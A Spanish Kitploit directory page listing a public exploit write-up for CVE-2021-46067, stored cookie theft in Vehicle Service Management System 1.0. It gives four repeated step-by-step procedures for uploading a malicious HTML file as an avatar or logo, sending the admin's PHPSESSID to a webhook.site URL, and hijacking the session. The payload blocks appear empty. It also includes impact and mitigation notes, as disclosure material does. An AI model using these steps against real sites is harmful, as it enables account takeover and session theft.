Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-46067 — CVE-2021-46067 - En Vehicle Service Management System 1.0, un atacante puede robar las cookies, lo que conduce a la toma de control total de la cuenta. | Kitploit
Herramientas/GitHubGitHub/sanupl/cve-2021-46067
Herramientas de PhishingExplotaciónHerramientas de SuplantaciónExplotación de Aplicaciones WebIngeniería SocialAutenticación
GitHubsanupl/cve-2021-46067

CVE-2021-46067

CVE-2021-46067 - En Vehicle Service Management System 1.0, un atacante puede robar las cookies, lo que conduce a la toma de control total de la cuenta.

Ver Repositorio
16hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-46067

Título del Exploit: Vehicle Service Management System - 'Múltiple' Robo de Cookies Conduce a la Toma Total de la Cuenta

Autor del Exploit: SANU P.L

CVE: CVE-2021-46067

CVSS: 9.8 CRÍTICO

Referencias:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46067
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46067

Descripción:

En Vehicle Service Management System 1.0, un atacante puede robar las cookies, lo que conduce a la Toma Total de la Cuenta.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección My Account http://localhost/vehicle_service/admin/?page=user
  3. Genere la URL del Webhook - https://webhook.site
  4. Copie la URL única del Webhook y péguela en el siguiente código html.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Cookie Stealing.html
  2. En la sección My Account, introduzca todos los detalles requeridos y seleccione el archivo html en Avatar.
  3. Haga clic en el botón update.
  4. Abra la imagen del avatar en una nueva pestaña y verifique el estado del Webhook.
  5. Obtuvimos la solicitud, contiene PHPSESSID.
  6. Copie el valor de PHPSESSID y abra cualquier otro navegador.
  7. Visite el panel de administración http://localhost/vehicle_service/admin
  8. Verifique los valores de las cookies y cambie el valor de PHPSESSID al valor de PHPSESSID copiado.
  9. Ahora acceda al panel de administración http://localhost/vehicle_service/admin
  10. Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección User List y haga clic en el botón Create New.
  3. Genere la URL del Webhook - https://webhook.site
  4. Copie la URL única del Webhook y péguela en el siguiente código html.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Cookie Stealing.html
  2. En la sección Create New User, introduzca todos los detalles requeridos y seleccione el archivo html en Avatar.
  3. Haga clic en el botón Save.
  4. Abra la imagen del avatar en una nueva pestaña y verifique el estado del Webhook.
  5. Obtuvimos la solicitud, contiene PHPSESSID.
  6. Copie el valor de PHPSESSID y abra cualquier otro navegador.
  7. Visite el panel de administración http://localhost/vehicle_service/admin
  8. Verifique los valores de las cookies y cambie el valor de PHPSESSID al valor de PHPSESSID copiado.
  9. Ahora acceda al panel de administración http://localhost/vehicle_service/admin
  10. Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección Settings http://localhost/vehicle_service/admin/?page=system_info
  3. Genere la URL del Webhook - https://webhook.site
  4. Copie la URL única del Webhook y péguela en el siguiente código html.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Cookie Stealing.html
  2. En la sección Settings, introduzca todos los detalles requeridos y seleccione el archivo html en System Logo.
  3. Haga clic en el botón update.
  4. Abra la imagen del System Logo en una nueva pestaña y verifique el estado del Webhook.
  5. Obtuvimos la solicitud, contiene PHPSESSID.
  6. Copie el valor de PHPSESSID y abra cualquier otro navegador.
  7. Visite el panel de administración http://localhost/vehicle_service/admin
  8. Verifique los valores de las cookies y cambie el valor de PHPSESSID al valor de PHPSESSID copiado.
  9. Ahora acceda al panel de administración http://localhost/vehicle_service/admin
  10. Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección Settings http://localhost/vehicle_service/admin/?page=system_info
  3. Genere la URL del Webhook - https://webhook.site
  4. Copie la URL única del Webhook y péguela en el siguiente código html.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Cookie Stealing.html
  2. En la sección Settings, introduzca todos los detalles requeridos y seleccione el archivo html en Website Cover.
  3. Haga clic en el botón update.
  4. Abra la imagen del Website Cover en una nueva pestaña y verifique el estado del Webhook.
  5. Obtuvimos la solicitud, contiene PHPSESSID.
  6. Copie el valor de PHPSESSID y abra cualquier otro navegador.
  7. Visite el panel de administración http://localhost/vehicle_service/admin
  8. Verifique los valores de las cookies y cambie el valor de PHPSESSID al valor de PHPSESSID copiado.
  9. Ahora acceda al panel de administración http://localhost/vehicle_service/admin
  10. Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.

Impacto:

Un atacante sube un archivo html malicioso que redirige a un sitio web de terceros y las cookies quedan expuestas en la solicitud. Esto conduce a la Toma Total de la Cuenta.

Mitigación:

Se recomienda validar la funcionalidad de carga de archivos y realizar verificaciones secundarias en la sesión.

Descargar herramienta